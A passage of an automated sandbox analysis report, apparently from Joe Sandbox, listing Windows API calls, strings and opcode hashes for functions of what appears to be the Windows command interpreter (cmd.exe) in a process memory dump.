                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                              • API String ID: 2624720099-1920437939
                              • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction ID: d4c3b875bc8dc8eb9766b6721dfbb8eee31440c9fe925ca5db71a0a561b87f74
                              • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction Fuzzy Hash: F1C19E31E0C642CAF714BF6294C55B8EAB1EF49754FCC4139DE4E46ADADE3CA840A720

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction ID: 4d23921d3bf5de036b7fae4249e554dbe89634a06411fb7383989b1f66660b30
                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction Fuzzy Hash: 78510A21B0C681C5EB30BF57A5842BAE6A0FB54BA0FCD4231DE6D576D8DF3CE845A210
                              APIs
                              • memset.MSVCRT ref: 00007FF744F07DA1
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F07EB7
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                              • String ID:
                              • API String ID: 168394030-0
                              • Opcode ID: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction ID: ff0c229c50df02746e2f8114fbc4ecde33d7ca79c5c88c924c1824253a8cdb6a
                              • Opcode Fuzzy Hash: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction Fuzzy Hash: DAA1D321B1CA42C5FB64FF2798942B9A2A1AF84784FCC4135DE1E476EDDF3CA945A310

                              Control-flow Graph

                              APIs
                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14D9A
                                • Part of subcall function 00007FF744F158E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF744F2C6DB), ref: 00007FF744F158EF
                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DBB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DCA
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DE0
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DEE
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E04
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10589
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F1059E
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105AF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F105C5
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105EF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F10605
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10632
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F10647
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                                • Part of subcall function 00007FF744F14AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                                • Part of subcall function 00007FF744F14AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F15554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF744F14E35), ref: 00007FF744F155DA
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15623
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15667
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F156BE
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15702
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E35
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E81
                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F69
                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F95
                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FB0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FC1
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FD8
                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FF8
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15037
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1504B
                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150DF
                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150F2
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1510F
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15130
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1514A
                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15175
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                              • API String ID: 1049357271-3021193919
                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction ID: 03d9aaedc08acfec22c322b50f9be0f3f40846986ccbd84b7925b8d74c3fb341
                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction Fuzzy Hash: A4C15D21A0CA42D6EB00BF52A895179E7A0FF89B91FCD9134DD0E477D9DF3CA945A220

                              Control-flow Graph

                              APIs
                              Strings
                              Similarity
                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                              • String ID: :
                              • API String ID: 1809961153-336475711
                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction ID: d973879bed12015df72a4bba9b949f625cdeec3256fa404a73f32ec130896df1
                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction Fuzzy Hash: 19D11C2260CB85C2EB64BF16E4952A9A7B1FB84750F884235DD8E426E9DF3CE944DB10

                              Control-flow Graph

                              APIs
                              Strings
                              Similarity
                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                              • API String ID: 2622545777-4197029667
                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction ID: 97f7f5ecca4f69be744bbb1543b8bdc4c36f124577b2f96df014b3674f19a3c7
                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction Fuzzy Hash: F7913F61B0DA86C6EF24BF52D8951B9A3A0FF48B84FC94135CD4E476D9DE3CE9059320

                              Control-flow Graph

                              APIs
                              Strings
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID: CMD.EXE
                              • API String ID: 1606018815-3025314500
                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction ID: 309dece1a9c2304b93f4ee4ccd785fd950191a00393b0ef31c026ed3b4818e58
                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction Fuzzy Hash: AF41EE31A0D712CBE704BF56E994578BAA0BB99B56FCC4134CD0E423E8DF3CA454E620

                              Control-flow Graph

                              APIs
                              Strings
                              Similarity
                              • API ID: ConsoleTitlewcschr
                              • String ID: /$:
                              • API String ID: 2364928044-4222935259
                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction ID: b8e50f7c11ef059dba6e433afef02a1ff7cde44faf4d7bd46017f958e31c05ea
                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction Fuzzy Hash: E2C16F61A1D682C1FB68BF179498279E2A1EF91B50FCD5131DD1E462D9EF3CE844E320

                              Control-flow Graph

                              APIs
                              Similarity
                              • API ID: CreateDirectoryDriveFullNamePathTypefreememset
                              • String ID:
                              • API String ID: 1445986735-0
                              • Opcode ID: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction ID: 32632971fc774d307bb2d75e1c1323aff88500682a0ec6e8ad495338f62c33bf
                              • Opcode Fuzzy Hash: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction Fuzzy Hash: 3A917362A0CB82C6EB65BF1294846B9F3A1FB84B85F898135DD4D077D8DF3CD940A720

                              Control-flow Graph

                              APIs
                              Similarity
                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                              • String ID:
                              • API String ID: 4291973834-0
                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction ID: a975b078e1f409cfba208c3e6e3cb99acd71dbf43d12ad3d933532e75396944f
                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction Fuzzy Hash: 4A41A031A0CA02C6FB50BF52EAC0279A2A5AB54784FC84535DD4D876E8DF7CEC94A760

                              Control-flow Graph

                              APIs
                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                              • memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              Similarity
                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                              • String ID:
                              • API String ID: 1623332820-0
                              • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                              • Instruction ID: bdb44c50045fdb1e58795b7cba7463e67017244e6ce5f0ba37a7d60873be03ed
                              • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                              • Instruction Fuzzy Hash: C0119122A1C742C2DB10BF02A454039FBB0EB89F80B9D9035DE4E03788DE3DE8419760

                              Control-flow Graph

                              APIs
                              Strings
                              Similarity
                              • API ID: memset
                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                              • API String ID: 2221118986-3416068913
                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction ID: d68bab9a3694ba35ec607accdd3fd8a8cbd7a44ef28edcdee22fa909431904d6
                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction Fuzzy Hash: B011C621A0D682C1EB54FF57A1D42B992A09F84BA4F9C4331DE6D4B7DDEE2CD480A320

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcschr
                              • String ID: 2$COMSPEC
                              • API String ID: 1764819092-1738800741
                              • Opcode ID: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction ID: be28c3af4466759b3fa88b8c37f47ddfd7a375fcf8d5c6c9d531115607d5ed44
                              • Opcode Fuzzy Hash: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction Fuzzy Hash: 36516921A1C643C5FB64BFA3A4C9379E2919FC5B84F8C4031DE0D4A6DEDE2CF844A661
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_taskmalloc
                              • String ID:
                              • API String ID: 1412018758-0
                              • Opcode ID: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction ID: 5a6b0ad1117d7046d1347a568a92a52e0f9609c87e45a28278a71ca1e95f116d
                              • Opcode Fuzzy Hash: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction Fuzzy Hash: 79E03240E0E20BC2FB283FA368C257892605F18B40F8C2430CD0D4A7CEEE2DA895E270
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction ID: d10e3ccbb626919f7bc1ad86611c1fe8da04576b537b1b4bc2b994ad73cea7e5
                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction Fuzzy Hash: 95F01D31A1C642C6EB14BF16F884578F7A0FB99B40B9C9434DE4E03398DF3CA441E610
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: exit
                              • String ID:
                              • API String ID: 2483651598-0
                              • Opcode ID: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction ID: 7710e6d0b294a27612e4b708d2cecc0d89f52baa82a7abeca6efe723b315ab64
                              • Opcode Fuzzy Hash: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction Fuzzy Hash: 8DC0123070C686C7EB1C7F3224D203995745B48201F48553CCD16852C5DE2CD8049610
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: DefaultUser
                              • String ID:
                              • API String ID: 3358694519-0
                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction ID: c96279c03d28a59c3891dd195563f59f44b9e76fd5f8c5117aa551d2f084abb9
                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction Fuzzy Hash: DCE08CA2D1C252CAF7943E4360C12B49963CB78786FC85031CE0E016C8592D3C416228
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction ID: 0e72c33b1ffc881289be9352e4b2ab3f500441efd4ef5ea920e8a5d69058bdd6
                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction Fuzzy Hash: 56F0B421B0D78180EF44AF97B58012992A09B48BE0F8C8334EE7D47BDDDE3CD8518300
                              APIs
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F44
                              • _get_osfhandle.MSVCRT ref: 00007FF744F27F5C
